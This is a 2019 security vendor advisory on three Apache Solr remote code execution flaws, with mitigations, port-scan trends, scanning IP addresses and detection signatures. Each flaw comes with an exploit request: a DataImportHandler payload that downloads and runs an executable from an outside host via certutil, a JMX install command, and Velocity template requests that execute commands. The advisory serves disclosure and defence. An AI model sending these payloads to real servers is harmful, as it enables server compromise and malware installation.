Apache Solr vulnerabilities bound to be attacked

November 27, 2019

What is Apache Solr?

Apache Solr is a fast open-source Java search server. Solr enables you to easily create search engines which searches websites, databases and files. It’s been an industry player for almost a decade, offers real-time indexing, dynamic clustering, load-balanced querying, replication, automated fail-over and recovery. Quite a few internet giants such as Netflix, eBay, Instagram, and Amazon use Solr because of its ability to index and search multiple sites.

Remote Code Execution Vulnerabilities:

CVE-2019-0193:

This vulnerability is due to the ability to remotely configure DataImportHandler via the “/solr//dataimport” URI. When such a request is received, the handleRequestBody() method of DataImportHandler is called, which results in a call to runCmd() with the request parameters as an argument. If the command HTTP parameter is set to full-import, doFullImport() is called which results in a call to DocBuilder.execute() causing the XML data to be evaluated. This XML data may contain components which may result in arbitrary code execution.

Exploit:

Target running a vulnerable version of the Solr software with the DataImportHandler plugin enabled, can be exploited with the below request.

POST /solr/test/dataimport HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referrer: http://XXXX:8983/solr/test/dataimport
User-Agent: Mozilla/4.0
Content-length:
Host: XXXX:8983

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process = jav.lang.Runtime.getRuntime();
process.exec("cm d.exe /c certutil.exe -urlcache -split -f http://fk.0xbdairolkoie.space/download.exe %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe & cm d.exe /c %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe");
return row;
}
]]</script>
</dataConfig>

Mitigation:

Solr versions prior to 8.2.0 are affected by this. Updating to the latest version will resolve the issue.

CVE-2019-12409:

This vulnerbaility is due to insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.

Exploit:

If ENABLE_REMOTE_JMX_OPTS is set to “true”, attackers can execute malicious code on the server using the below code.

java -jar jython-standalone-2.7.0.jar mjet.py host 18983 install super_secret

Mitigation:
Solr versions 8.1.1 and 8.2.0 for Linux are affected by this.

This issue can be fixed by changing the ENABLE_REMOTE_JMX_OPTS set to ‘false’ on every Solr node and then restart Solr server or by updating Solr to the latest version.
Also recommend blocking inbound traffic on JMX_PORT.


Zero day (CVE not yet assigned):

Apache Solr has a remote command execution vulnerability based on Velocity templates. This vulnerability is due to the injection of Velocity templates. An attacker could use the vulnerability to access the Core name on the Solr server, first set params.resource.loader.enabled to true, then load a resource and execute the command on the server.

Exploit:

Apache-Solr integrates the VelocityResponseWriter plug-in by default. The params.resource.loader.enabled parameter in the plug-in initialization is used to control whether the parameter resource loader is allowed to specify a template in the Solr request parameter. The default setting is false. The attacker can set the parameter params.resource.loader.enabled to true through a POST request. Later sending a crafted GET request code can cause a remote code execution on the Solr server.

The params.resource.loader.enabled option of the VelocityResponseWriter initialization parameter in the Velocity template is turned on with the following POST request.

POST / solr / test / config HTTP / 1.1
Host: solr: 8983
Content-Type: application / json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

Later, attackers load a malicious templates into the Solr template with the following GET request.

GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java. lang.Runtime% 27)) +% 23set ($ chr = $ x.class.forName (% 27java.lang.Character% 27)) +% 23set ($ str = $ x.class.forName (% 27java.lang. String% 27)) +% 23set ($ ex = $ rt.getRuntime (). Exec (% 27id% 27)) + $ ex.waitFor () +% 23set ($ out = $ ex.getInputStream ()) +% 23foreach ($ i + in + [1 .. $ out.available ()]) $ str.valueOf ($ chr.toChars ($ out.read ()))% 23end HTTP / 1.1
Host: XXX:8983

Mitigation:

No fix from the vendor available yet.

Review the VelocityResponseWriter class in the solrconfig.xml configuration file, ensure the params.resource.loader.enabled value is set to false.
Also make sure Config API is locked down, else attacker could modify the solrconfig.xml.

Trend Chart:

At the time of writing this article, we are not aware of attacks exploiting these vulnerabilities in the wild, but we see an increasing scanning activity for port 8983 & 18983 in the recent past. More Widespread attacks on the vulnerable Solr servers could be imminent.

 

Fig: Port activity taken from SANS Internet Storm Center: Port 8983

Fig: Port activity taken from SANS Internet Storm Center: Port 18983

Top IP’s scanning the port 8983:

185.153.197.5
185.153.197.5
51.38.162.236
159.203.201.236
159.203.201.19
51.38.162.236
159.203.201.84
159.203.201.64
211.159.219.162
125.64.94.221
194.61.24.102

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

IPS: 14096 Apache Solr Config API Insecure Deserialization
IPS: 14445 Apache Solr DataImportHandler Remote Code Execution 1
IPS: 14446 Apache Solr DataImportHandler Remote Code Execution 2
IPS: 14599 Apache Solr DataImportHandler Remote Code Execution 3
IPS 14600 Apache Solr Config VelocityResponseWriter
IPS: 13036 Apache Solr Remote Code Execution 1
IPS: 13037 Apache Solr Remote Code Execution 2
IPS: 13287 Apache Solr DataImportHandler Information Disclosure
WAF: 1738 Apache Solr DataImportHandler Remote Code Execution
WAF: 1702 Apache Solr Config API Insecure Deserialization